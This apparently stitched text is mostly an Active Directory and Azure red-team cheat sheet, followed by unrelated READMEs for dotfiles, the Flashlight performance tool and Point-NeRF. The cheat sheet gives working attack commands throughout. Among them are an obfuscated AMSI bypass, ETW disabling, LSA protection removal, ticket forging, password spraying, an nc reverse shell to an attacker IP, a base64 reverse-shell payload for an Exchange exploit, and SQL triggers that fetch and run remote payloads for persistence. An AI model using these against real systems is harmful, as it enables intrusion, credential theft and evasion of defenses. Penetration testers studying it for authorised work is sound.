[ ❓ ] **What is the Registry?** : the Registry is divided into several sections called **hives**. A registry hive is a top level registry key predefined by the Windows system to store **registry keys** for specific objectives. Each registry hive has specific objectives; there are **6 registry hives: HKCU, HKLM, HKCR, HKU, HKCC and HKPD**. The most interesting registry hives in pentesting are HKU and HKLM. **HKEY_LOCAL_MACHINE**, called HKLM, includes three keys: SAM, SYSTEM, and SECURITY.

> parse the saved SYSTEM and SECURITY hives (and NTDS) locally :

```bash
secretsdump.py local -system SYSTEM -security SECURITY -ntds ntds.dit -outputfile hashes
```

> dump the HKU registry remotely with the hashes argument :

```bash
impacket-reg -hashes :34ed87d42adaa3ca4f5db34a876cb3ab domain.local/john.doe@job query -keyName HKU\\Software

HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
```

### Read GMSA Password

```powershell
$user = 'USER'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
```

*gMSA dumping:*

```bash
python3 gMSADumper.py -u $user -p $password -d $domain.local
```

## Hash Cracking

> LM :

```bash
# using JTR :
john --format=lm hash.txt
# using hashcat :
hashcat -m 3000 -a 3 hash.txt
```

> NT :

```bash
# using JTR :
john --format=nt hash.txt --wordlist=wordlist.txt
# using hashcat :
hashcat -m 1000 -a 3 hash.txt
```

> NTLMv1 :

```bash
# using JTR :
john --format=netntlmv1 hash.txt
# using hashcat :
hashcat -m 5500 --force -a 0 hash.txt wordlist.txt
```

> NTLMv2 :

```bash
# using JTR :
john --format=netntlmv2 hash.txt
# using hashcat :
hashcat -m 5600 --force -a 0 hash.txt wordlist.txt
```

note: some hash types in hashcat depend on the **etype**

## Bruteforce AD Password

### Custom Username and Password wordlist

default password list (pwd_list) :

```
Autumn
Spring
Winter
Summer
```

create passwords using bash & hashcat :

```bash
for i in $(cat pwd_list); do echo $i; echo ${i}\!; echo ${i}2019; echo ${i}2020 ;done > pwds
hashcat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule
hashcat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u
hashcat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u | awk 'length($0) > 7' > pwlist.txt
```

default username list (users.list) :

```
john doe
paul smith
jacques miller
```

create custom usernames using username-anarchy :

```bash
./username-anarchy --input-file users.list --select-format first,first.last,f.last,flast > users2.list
```

## Pivoting

**Pivot with WDFW via custom rules**

```powershell
netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCAL_PORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp
```

*allow connections to the local port*

```powershell
netsh advfirewall firewall add rule name="pivot like a pro" protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow
```

### SMB Pipes

**Local/Remote ports can be forwarded** using **SMB pipes**. You can use [Invoke-Piper](https://github.com/p3nt4/Invoke-Piper) or [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy) for that, as in the cases below.
- `Invoke-Piper` : *used to forward local or remote ports*
- `Invoke-SocksProxy` : *used for dynamic port forwarding*

**Case 1**

*Local port forwarding through pipe forPivot: `-L 33389:127.0.0.1:3389`*

> SERVER SIDE :

```powershell
Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3389
```

> CLIENT SIDE :

```powershell
Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 33389
```

**Case 2**

*Admin only remote port forwarding through pipe forPivot: `-R 33389:127.0.0.1:3389`*

> SERVER SIDE :

```powershell
Invoke-PiperServer -remote -bindPipe forPivot -bindPort 33389 -security Administrators
```

> CLIENT SIDE :

```powershell
Invoke-PiperClient -remote -destPipe forPivot -pipeHost $server_ip -destHost 127.0.0.1 -destPort 3389
```

**Case 3**

*Dynamic port forwarding with Invoke-SocksProxy with forPivot as NamedPipe: `-D 3333`*

> SERVER SIDE :

```powershell
Invoke-SocksProxy -bindPort 3333
Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3333
```

> CLIENT SIDE :

```powershell
Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 3333
```

### SharpSocks

**SharpSocks is mostly used in C2 frameworks and works with C2 implants**

*build a server:*

```powershell
PS> .\SharpSocksServer.exe --cmd-id=$id --http-server-uri=$uri --encryption-key=$key -v
```

### RDP Tunneling via DVC

*sharing drives:*

```powershell
PS > regsvr32 UDVC-Plugin.dll
PS > subst.exe x: C:\Users\john\RDP_Tools
```

*map the drives:*

```powershell
PS > net use x: \\TSCLIENT\X
```

create a server with SSFD.exe

```powershell
PS > ssfd.exe -p 8080
```

*Redirect SSF port with DVC server:*

```powershell
PS > ./UDVC-Server.exe -c -p 8080 -i 127.0.0.1
[*] Setting up client socket
[*] Connected to: 127.0.0.1:8080
[*] Starting thread RsWc
[*] Starting thread RcWs
[*] Wait for threads to exit...
```

*SSFD as a SOCKS proxy*

```powershell
PS > ssf.exe -D 9090 -p 31337 127.0.0.1
```

## Persistence

### SIDHistory Injection

### AdminSDHolder and SDProp

> [ ❓ ] : With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. In 60 minutes (when SDProp runs), the user will be added with Full Control to the ACL of groups like Domain Admins without actually being a member of them.
> using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :

```powershell
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights All -Verbose
```

> using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :

```powershell
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=megacorp,DC=megacorp,DC=local' -Principal $user -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights WriteMembers -Verbose
```

*Run SDProp manually*

```powershell
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
```

## ACLs and ACEs Abusing

### GenericAll

**list all groups to which the user belongs and has explicit access rights**

```powershell
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
```

```powershell
net group Administrator aker /add /domain
```

## Enhanced Security Bypass

### AntiMalware Scan Interface

```powershell
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

patching AMSI from Powershell6 :

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

### ConstrainLanguageMode

Bypass CLM using a **runspace**:

```cs
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

class Program
{
    static void Main(string[] args)
    {
        // A runspace created through the .NET API is not subject to the
        // Constrained Language Mode policy applied to powershell.exe
        Runspace run = RunspaceFactory.CreateRunspace();
        run.Open();
        PowerShell shell = PowerShell.Create();
        shell.Runspace = run;
        String cmd = "iex(new-object net.webclient).DownloadString('http://10.10.14.33/script')";
        shell.AddScript(cmd);
        shell.Invoke();
        run.Close();
    }
}
```

### Just Enough Administration

> show the current language level :

```powershell
# METHOD 1
(Get-PSSessionConfiguration -Name Test).LanguageMode
# METHOD 2
$ExecutionContext.SessionState.LanguageMode # use property
```

> Bypass JEA in ConstrainedLanguage :

```powershell
{ C:\Windows\System32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.33 9003 }
```

### ExecutionPolicy

```powershell
powershell -ExecutionPolicy Bypass -File C:\script.ps1
```

> bypass EP using encoding :

```powershell
$command = "Write-Host 'hello world'"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($command);$encoded = [Convert]::ToBase64String($bytes); powershell.exe -EncodedCommand $encoded
```

### RunAsPPL for Credentials Dumping

[ ❓ ] : [RunAsPPL](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) is an **additional LSA protection** that prevents **non-protected processes** from reading LSA memory and injecting code.
> bypass RunAsPPL with mimikatz :

```
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
```

### ETW Disabling

```powershell
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
```

you can try obfuscation techniques on this command. To learn more about ETW, see my course [here](https://github.com/RistBS/Active-directory-Cheat-sheet/blob/exploit-development/FR%20-%20ETW%20Bypassing.md)

## MS Exchange

### OWA, EWS and EAS Password Spraying

> using [MailSniper](https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1) :

```powershell
# OWA (Outlook Web App)
Invoke-PasswordSprayOWA -ExchHostname $domain -UserList .\users.txt -Password $password
# EAS (Exchange ActiveSync)
Invoke-PasswordSprayEAS -ExchHostname $domain -UserList .\users.txt -Password $password
# EWS (Exchange Web Services)
Invoke-PasswordSprayEWS -ExchHostname $domain -UserList .\users.txt -Password $password
```

> using [ruler](https://github.com/sensepost/ruler) :

```bash
./ruler -domain $domain --insecure brute --userpass $userpass.txt -v
```

### GAL and OAB Extraction

**GAL (Global Address List) Extraction**

```powershell
./ruler -k -d $domain -u $user -p $password -e user@example.com --verbose abk dump -o email_list.txt
```

> using powershell :

```powershell
PS C:\> Get-GlobalAddressList -ExchHostname mx.megacorp.com -UserName $domain\$user -Password $password -OutFile email_list.txt
```

**OAB (Offline Address Book) Extraction**

*extract the OAB.XML file which contains records*

```bash
curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/oab.xml > oab.xml
cat oab.xml |grep '.lzx' |grep data
```

*extract the LZX compressed file*

```bash
curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/$OABId-data-1.lzx > oab.lzx
./oabextract oab.lzx oab.bin && strings oab.bin |egrep -o "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])" | sort -u > emails.txt
```

> using [oaburl.py](https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438) :

```powershell
./oaburl.py $domain/$user:$password@domain.com -e valid@domain.com
```

### PrivExchange

**[PrivExchange](https://github.com/dirkjanm/PrivExchange) uses the PushSubscription feature: a user is able to capture the NTLM authentication data of an Exchange server with a simple call to the "PushSubscription" API**

```bash
responder -I eth0 -Av
python3 privexchange.py -d $domain -u $user -p $password -ah -ap '/test/test/test' mx.server.com --debug
```

### ProxyLogon

**[ProxyLogon](https://github.com/hausec/ProxyLogon) is the name given to CVE-2021-26855, which allows an attacker to bypass authentication and impersonate users on MS Exchange servers**

```bash
python proxylogon.py $ip user@fqdn
```

> using metasploit:

```bash
use auxiliary/scanner/http/exchange_proxylogon
use auxiliary/gather/exchange_proxylogon
use exploit/windows/http/exchange_proxylogon_rce
```

### CVE-2020-0688

This CVE allows RCE on the Exchange Control Panel (ECP) through fixed cryptographic keys.

*Get the values for RCE :*

- *ViewStateUserKey* : value of the `ASP.NET_SessionId` cookie
- *ViewStateGenerator* : `document.getElementById("_VIEWSTATEGENERATOR").value`

```powershell
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc JHNtPShOZXctT2JqZWN0IE5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTAuMTAuMTQuOSIsOTAwNikpLkdldFN0cmVhbSgpO1tieXRlW11dJGJ0PTAuLjY1NTM1fCV7MH07d2hpbGUoKCRpPSRzbS5SZWFkKCRidCwwLCRidC5MZW5ndGgpKSAtbmUgMCl7OyRkPShOZXctT2JqZWN0IFRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRidCwwLCRpKTskc3Q9KFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKChpZXggJGQgMj4mMSkpOyRzbS5Xcml0ZSgkc3QsMCwkc3QuTGVuZ3RoKX0=" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug --islegacy
```

## MSSQL Server

### UNC Path Injection

[ ❓ ] : Uniform Naming Convention __allows the sharing of resources__ on a network via a very precise syntax: `\\IP-Server\shareName\Folder\File`

launch responder : `responder -I eth0`

```sql
EXEC master..xp_dirtree '\\192.168.1.33\evil';
```

```sql
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```

### MC-SQLR Poisoning

*The SQL Server Resolution Protocol is a simple application-level protocol that is used for the transfer of requests and responses between clients and database server discovery services.*

```vbs
CreateObject("ADODB.Connection").Open "Provider=SQLNCLI11;Data Source=DOESNOTEXIST\INSTANCE;Integrated Security=SSPI;"
```

> we captured the hash of the **Administrator** with this VBA script.

```
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[MSSQL-BROWSER] Sending poisoned browser response to 10.10.14.33
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist
[MSSQL] NTLMv2 Client   : 10.1.2.3
[MSSQL] NTLMv2 Username : TEST\Administrator
[MSSQL] NTLMv2 Hash     : Administrator::TEST:1122334455667788...
```

### DML, DDL and Logon Triggers

[ ❓ ] : **Triggers** are stored procedures that automatically execute when an event occurs in the SQL Server.

- Data Definition Language (DDL) - Executes on Create, Alter and Drop statements and some system stored procedures.
- Data Manipulation Language (DML) - Executes on Insert, Update and Delete statements.
- Logon Triggers - Executes on a user logon.
**Triggers Listing**

*list all server triggers*

```sql
SELECT * FROM sys.server_triggers
```

*list triggers for a database*

```sql
SELECT * FROM sys.triggers
```

*list DDL and DML triggers on an instance using powershell*

```powershell
Get-SQLTriggerDdl -Instance ops-sqlsrvone -username $username -Password $password -Verbose
Get-SQLTriggerDml -Instance ops-sqlsrvone -username $username -Password $password -Verbose
```

*use DML triggers for persistence*

```sql
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
USE testdb
CREATE TRIGGER [persistence_dml_1]
ON testdb.dbo.datatable
FOR INSERT, UPDATE, DELETE AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString(''http://$ip_attacker/payload.ps1'')"'
GO
```

*use DDL triggers for persistence*

```sql
CREATE Trigger [persistence_ddl_1]
ON ALL Server
FOR DDL_LOGIN_EVENTS AS
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString(''http://$ip_attacker/payload.ps1'')"'
GO
```

*use Logon triggers for persistence*

```sql
CREATE Trigger [persistence_logon_1]
ON ALL SERVER WITH EXECUTE AS 'sa'
FOR LOGON AS
BEGIN
IF ORIGINAL_LOGIN() = 'testuser'
EXEC master..xp_cmdshell 'powershell -C "iex (new-object System.Net.WebClient).DownloadString(''http://$ip_attacker/payload.ps1'')"'
END;
```

## Forest Persistence

### DCShadow

**DCShadow temporarily registers a new domain controller in the target domain** and uses it to "push" attributes like SIDHistory, SPNs... on specified objects without leaving change logs for the modified objects!

*⚠️ Requirements :*

- DA privileges are required to use DCShadow.
- The attacker's machine must be part of the root domain.

The attack needs 2 instances on a compromised machine:

**Instance 1 :** *start RPC servers with SYSTEM privileges and specify the attributes to be modified*

```c
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:root1user /attribute:Description /value="Hello from DCShadow"
```

**Instance 2 :** *with DA privileges, push the values :*

```c
mimikatz # sekurlsa::pth /user:Administrator /domain:$domain /ntlm:$admin_hash /impersonate
mimikatz # lsadump::dcshadow /push
```

## Cross Forest Attacks

### Trust Tickets

*Dumping the trust key*

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
```

*Forging the inter-realm TGT using the trust key*

```powershell
Invoke-Mimikatz -Command '"Kerberos::golden /domain:$domain /sid:$sid /sids:$extra_sids /rc4:$rc4_hash /user:Administrator /service:krbtgt /target:$target /ticket:$path/to/trust_ticket.kirbi"'
```

*get a TGS for the CIFS service*

```powershell
asktgs path/to/trust_ticket.kirbi CIFS/ps-dc.powershell.local
```

*use the TGS for the CIFS service*

```powershell
kirbikator.exe lsa .\CIFS.$domain.kirbi
ls \\$domain\c$
```

### Using KRBTGT Hash

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domaine.fun.local /sid:S-1-5-x-x-x-x /sids:S-1-5-x-x-x-x-519 /krbtgt:<hash> /ticket:C:\path\krb_tgt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\krb_tgt.kirbi"'
```

## Azure Active Directory

### AZ User Enumeration

*connect to Azure Active Directory with **Connect-MsolService**.*

```powershell
PS> Connect-MsolService -Credential $cred
```

*this command allows enumerating users along with their MFA (Multi-Factor Authentication) status*

```powershell
Get-MsolUser -EnabledFilter EnabledOnly -MaxResults 50000 | select DisplayName,UserPrincipalName,@{N="MFA Status"; E={ if($_.StrongAuthenticationRequirements.State -ne $null){ $_.StrongAuthenticationRequirements.State} else { "Disabled"}}} | export-csv mfaresults.csv
```

*locate the Azure AD Connect server*

```powershell
ldapsearch -H ldap://DC01.MEGACORP.CORP:389 -D "MEGACORP\john" -w $password -b "DC=MEGACORP,DC=CORP" '(description=*Azure*)' description
```

### Enumeration using AZ CLI

**Storage Enumeration**

*blob storage enumeration*

```powershell
az storage account list -o table
az storage account list -o json | jq -r '.[].name'
```

### PowerZure

*create a new user*

```powershell
New-AzureUser -Username 'john.doe@megacorp.com' -Password catAker
```

*Execute a command on a specified VM*

```powershell
Execute-Command -OS Windows -VM Win10 -ResourceGroup rg01 -Command "whoami"
```

### Golden SAML

*⚠️ Requirements :*

- Admin privileges on the ADFS server
- `ADFS Public Certificate`
- `IdP Name`
- `Role Name`

> Obtain the `ADFS Public Certificate`:

```powershell
PS > [System.Convert]::ToBase64String($cer.rawdata)
```

> Obtain the `IdP Name`:

```powershell
PS > (Get-ADFSProperties).Identifier.AbsoluteUri
```

> Obtain the `Role Name`:

```powershell
PS > (Get-ADFSRelyingPartyTrust).IssuanceTransformRule
```

a toolkit to exploit Golden SAML can be found [here](https://github.com/secureworks/whiskeysamlandfriends)

> **Golden SAML is the SAML counterpart of the golden ticket attack on the Kerberos protocol. Like a golden ticket, a golden SAML token allows an attacker to access resources protected by SAML agents (examples: Azure, AWS, vSphere, Okta, Salesforce, ...) with elevated privileges.**

*ShockNAwe:*

- 1. Remotely extracts the AD FS configuration settings
- 2. Forges and signs a Golden SAML token
- 3. Extracts the 'assertion' portion of the Golden SAML token and passes it to the Azure Core Management API to obtain a valid access token for the API
- 4. Enumerates the Subscription ID
- 5. Enumerates the complete list of VMs in the subscription
- 6. Executes arbitrary commands on all VMs as SYSTEM/root

*WhiskeySAML:*

- 1. Remotely extract AD FS configuration settings
- 2. Forge and sign Golden SAML tokens
- 3. Pass the Golden SAML token to the Microsoft Azure portal
- 4. Log into the Azure portal as any user while bypassing Azure MFA configurations

```bash
python3 shocknawe.py --target-user $user --domain $domain --adfs-host=$adfs_server --dc-ip $ip
```

### PRT Manipulation

#### PassThePRT

*check AzureAdJoined status and download Mimikatz:*

```powershell
dsregcmd.exe /status
iex (New-Object Net.Webclient).downloadstring("https://server/Invoke-Mimikatz.ps1")
```

*Looking for **prt** and **KeyValue**:*

```c
mimikatz # privilege::debug
mimikatz # sekurlsa::cloudap
```

*use the **APKD function** to decode **KeyValue** and save the **"Context"** and **"DerivedKey"** values:*

```c
mimikatz # token::elevate
mimikatz # dpapi::cloudapkd /keyvalue:$KeyValue /unprotect
```

```c
mimikatz # dpapi::cloudapkd /context:$context /derivedkey:$DerivedKey /Prt:$prt
---SNIP---
Signed JWT : eyJ...
```

*Forge a PRT cookie using [lantern](https://github.com/ConstantinT/Lantern):*

```powershell
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe cookie --sessionkey <SessionKey> --prt <PRT from Mimikatz>
```

*Generate JWT*

```powershell
PS AADInternals> $PRT_OF_USER = '...'
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
PS AADInternals> $ClearKey = "XXYYZZ..."
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
```

### MSOL Service Account

> you can dump the MSOL Service account (used by Azure AD Connect Sync) with [azuread_decrypt_msol.ps1](https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c) and launch a DCSync attack with the dumped creds

*DCSync with the MSOL account*

```powershell
secretsdump -outputfile hashes $domain/$msol_svc_acc:$msol_pwd@$ip
```

## Miscs

### Domain Level Attribute

#### MachineAccountQuota (MAQ) Exploitation

use crackmapexec (CME) with the maq module : `cme ldap $dc -d $DOMAIN -u $USER -p $PASSWORD -M maq`

#### BadPwdCount

```
crackmapexec ldap 10.10.13.100 -u $user -p $pwd --kdcHost 10.10.13.100 --users

LDAP    10.10.13.100    389    dc1    Guest badpwdcount: 0 pwdLastSet: <never>
```

### Abusing IPv6 in AD

sending an ICMPv6 packet to the target using ping6 : `ping6 -c 3 <target>`

scanning an IPv6 address using nmap : `nmap -6 -sCV dead:beef:0000:0000:b885:d62a:d679:573f --max-retries=2 --min-rate=3000 -Pn -T3`

tips for adapting tools to IPv6 :

```bash
echo -n "port1" "port2" "port3" | xargs -d ' ' -I% bash -c 'socat TCP4-LISTEN:%,fork TCP6:[{ipv6-address-here}]:% &'
netstat -laputen |grep LISTEN
```

you can replace the AF_INET value with AF_INET6 in scripts using the Python socket lib :

```bash
sed -i "s/AF_INET/AF_INET6/g" script.py
```

#### Rogue DHCP

`mitm6 -i eth0 -d 'domain.job.local'`

#### IOXIDResolver Interface Enumeration

it's a little script that enumerates the addresses in the NetworkAddr field with the [**RPC_C_AUTHN_DCE_PUBLIC**](https://docs.microsoft.com/en-us/windows/win32/rpc/authentication-service-constants) level

```py
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dcomrt import IObjectExporter

RPC_C_AUTHN_DCE_PUBLIC = 2

stringBinding = r'ncacn_ip_tcp:%s' % "IP"
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpc = rpctransport.get_dce_rpc()
rpc.set_auth_level(RPC_C_AUTHN_DCE_PUBLIC)
rpc.connect()

print("[*] Try with RPC_C_AUTHN_DCE_PUBLIC...")
exporter = IObjectExporter(rpc)
binding = exporter.ServerAlive2()

for bind in binding:
    adr = bind['aNetworkAddr']
    print("Address:", adr)
```

## References

- https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/cloudap
- https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/
- https://www.thehacker.recipes/ad/movement/kerberos/asreproast
- https://www.hackingarticles.in/credential-dumping-ntds-dit/
- https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
- https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
- https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94
- https://github.com/rootsecdev/Azure-Red-Team
- https://www.secureworks.com/blog/going-for-the-gold-penetration-testing-tools-exploit-golden-saml
Red Team Cheatsheet in constant expansion.
active-directory,pentesting,enumeration,redteam,powershell,real-life,oscp,osep,attack,attacking-active-directory
0
6
12
298
0
2
0
saimoomedits/dotfiles
null
The ArchLinux and AwesomeWM configs. 📂
archlinux,dotfiles,arch-linux,awesomewm,ricing,rice,linux,setup,configuration,desktop
0
5
10
82
11
2
0
bamlab/flashlight
<p align="center"> <img src="./website/static/img/logo-black.svg" alt="Flashlight" width="50%" ><br /> </p>

# Get a performance score for your app 🔦

Flashlight generates a performance score for your Android app, aggregating different metrics. _(📱 iOS support is also [in the works](https://github.com/bamlab/flashlight/issues))_

🙅 No setup required in your app

🚀 Measure performance even on **production** apps

✨ Generates beautiful reports ([like this Flatlist/Flashlist comparison](https://docs.flashlight.dev/examples/flashlist/report.html))

<img width="596" alt="image" src="https://github.com/bamlab/flashlight/assets/4534323/82e107f4-8682-4c77-ab18-985fa1b8c2d1" style="border-radius: 10px">
<br />
<br />

With Flashlight 🔦, you can either:

- Upload an app and get your performance score on [app.flashlight.dev](https://app.flashlight.dev/)

Or use the CLI:

- [`flashlight measure`](https://docs.flashlight.dev): quickly audit your perf with real-time measures
- [`flashlight test`](https://docs.flashlight.dev/test): automate your measures with e2e performance testing over several iterations
- [`flashlight cloud`](https://docs.flashlight.dev/cloud): run measures on real devices in the cloud & integrate in your CI setup

## Installation

**macOS/Linux**

```bash
curl https://get.flashlight.dev | bash
```

**Windows**

```powershell
iwr https://get.flashlight.dev/windows -useb | iex
```

## Usage

Head over to the docs at [docs.flashlight.dev](https://docs.flashlight.dev)

## Contributing

We love pull requests! Head over to [the contribution guide](./CONTRIBUTING.md) to get started.
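For a first try after installing, the quickest path is the real-time measure command listed above (a minimal sketch; run it with an Android device or emulator connected, and see the docs for the full set of options):

```bash
# Launch the interactive, real-time performance measure UI
flashlight measure
```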
๐Ÿ“ฑโšก๏ธ Lighthouse for Mobile - audits your app and gives a performance score to your Android apps (native, React Native, Flutter..). Measure performance on CLI, E2E tests, CI...
android,performance,react-native,flutter,lighthouse,native,e2e,mobile,apm,monitoring
83
81
236
451
11
40
8
Xharlie/pointnerf
# Point-NeRF: Point-based Neural Radiance Fields (CVPR 2022 Oral 🤩)

<img src="./images/Adobe-Logos.png" width=120px /><img src="images/USC-Logos.png" width=120px />

[Project Sites](https://xharlie.github.io/projects/project_sites/pointnerf/index.html) | [Paper](https://arxiv.org/pdf/2201.08845.pdf) | Primary contact: [Qiangeng Xu](https://xharlie.github.io/)

Point-NeRF uses neural 3D point clouds, with associated neural features, to model a radiance field. Point-NeRF can be rendered efficiently by aggregating neural point features near scene surfaces, in a ray marching-based rendering pipeline. Moreover, Point-NeRF can be initialized via direct inference of a pre-trained deep network to produce a neural point cloud; this point cloud can be finetuned to surpass the visual quality of NeRF with 30X faster training time. Point-NeRF can be combined with other 3D reconstruction methods and handles the errors and outliers in such methods via a novel pruning and growing mechanism.

<!-- <img src="./images/pipeline.png" /> -->

[![CVPR 2022 Oral Presentation](https://github.com/Xharlie/pointnerf/blob/master/images/youtube.png)](https://youtu.be/zmR9j-4AebA)

## Reference

Please cite our paper if you are interested in <strong>Point-NeRF: Point-based Neural Radiance Fields</strong>. &nbsp;&nbsp;&nbsp;

```
@inproceedings{xu2022point,
  title={Point-nerf: Point-based neural radiance fields},
  author={Xu, Qiangeng and Xu, Zexiang and Philip, Julien and Bi, Sai and Shu, Zhixin and Sunkavalli, Kalyan and Neumann, Ulrich},
  booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},
  pages={5438--5448},
  year={2022}
}
```

## Updates

1. To replace pycuda, we have implemented the pytorch cuda functions for grouping neural points with world coordinates. Simply set wcoord_query=-1 in your configuration file if the original setting is wcoord_query=1 (see dev_scripts/w_n360/chair_cuda.sh).
